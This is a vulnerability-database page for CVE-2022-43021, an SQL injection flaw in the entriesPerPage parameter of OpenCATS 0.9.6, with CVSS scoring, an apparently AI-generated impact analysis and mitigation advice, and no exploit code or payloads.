Skip to main content

CVE-2022-43021: n/a in n/a

Medium
VulnerabilityCVE-2022-43021cvecve-2022-43021
Published: Wed Oct 19 2022 (10/19/2022, 00:00:00 UTC)
Source: CVE
Vendor/Project: n/a
Product: n/a

Description

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable.

AI-Powered Analysis

AILast updated: 07/05/2025, 02:41:30 UTC

Technical Analysis

CVE-2022-43021 is a medium-severity SQL injection vulnerability identified in OpenCATS version 0.9.6. OpenCATS is an open-source applicant tracking system used for recruitment management. The vulnerability arises from improper sanitization of the 'entriesPerPage' variable, which is used to control pagination of displayed entries. An attacker with at least low-level privileges (PR:L) can manipulate this parameter to inject malicious SQL code. The vulnerability has a CVSS 3.1 base score of 6.5, indicating a medium severity level. The attack vector is network-based (AV:N), requiring no user interaction (UI:N), and the scope is unchanged (S:U). The impact primarily affects confidentiality (C:H), with no direct impact on integrity or availability. Exploiting this vulnerability could allow an attacker to extract sensitive data from the underlying database, such as candidate information, user credentials, or other confidential recruitment data. However, exploitation requires some level of authenticated access, limiting the attack surface to users who can interact with the application. No known public exploits have been reported to date, and no official patches or vendor advisories are currently available. The vulnerability is classified under CWE-89, which corresponds to SQL injection flaws that allow attackers to interfere with the queries an application makes to its database.

Potential Impact

For European organizations using OpenCATS, particularly HR departments and recruitment agencies, this vulnerability poses a risk of unauthorized data disclosure. Sensitive personal data of candidates and employees, protected under GDPR, could be exposed, leading to regulatory penalties and reputational damage. The confidentiality breach could also facilitate further attacks, such as identity theft or social engineering. Since the vulnerability requires authenticated access, the risk is higher if internal accounts are compromised or if weak access controls allow unauthorized users to reach the vulnerable functionality. The lack of integrity and availability impact reduces the risk of data manipulation or service disruption, but the exposure of confidential data remains a significant concern. Organizations relying on OpenCATS for recruitment workflows should consider the potential for insider threats or compromised credentials to escalate the impact of this vulnerability.

Mitigation Recommendations

European organizations should immediately review and restrict access to OpenCATS instances, ensuring that only trusted and authenticated users can access the application. Implement strict input validation and sanitization on the 'entriesPerPage' parameter to prevent SQL injection. If possible, apply web application firewalls (WAFs) with rules targeting SQL injection patterns to provide an additional layer of defense. Conduct thorough code reviews and penetration testing focused on input handling in OpenCATS. Since no official patch is currently available, consider isolating the application within a segmented network zone to limit exposure. Monitor logs for unusual database query patterns or access attempts that could indicate exploitation attempts. Additionally, enforce strong authentication mechanisms, including multi-factor authentication (MFA), to reduce the risk of credential compromise. Backup sensitive data regularly and ensure incident response plans are updated to handle potential data breaches involving recruitment data.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2022-10-17T00:00:00.000Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9818c4522896dcbd7a41

Added to database: 5/21/2025, 9:08:40 AM

Last enriched: 7/5/2025, 2:41:30 AM

Last updated: 8/1/2025, 6:13:04 PM

Views: 18

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats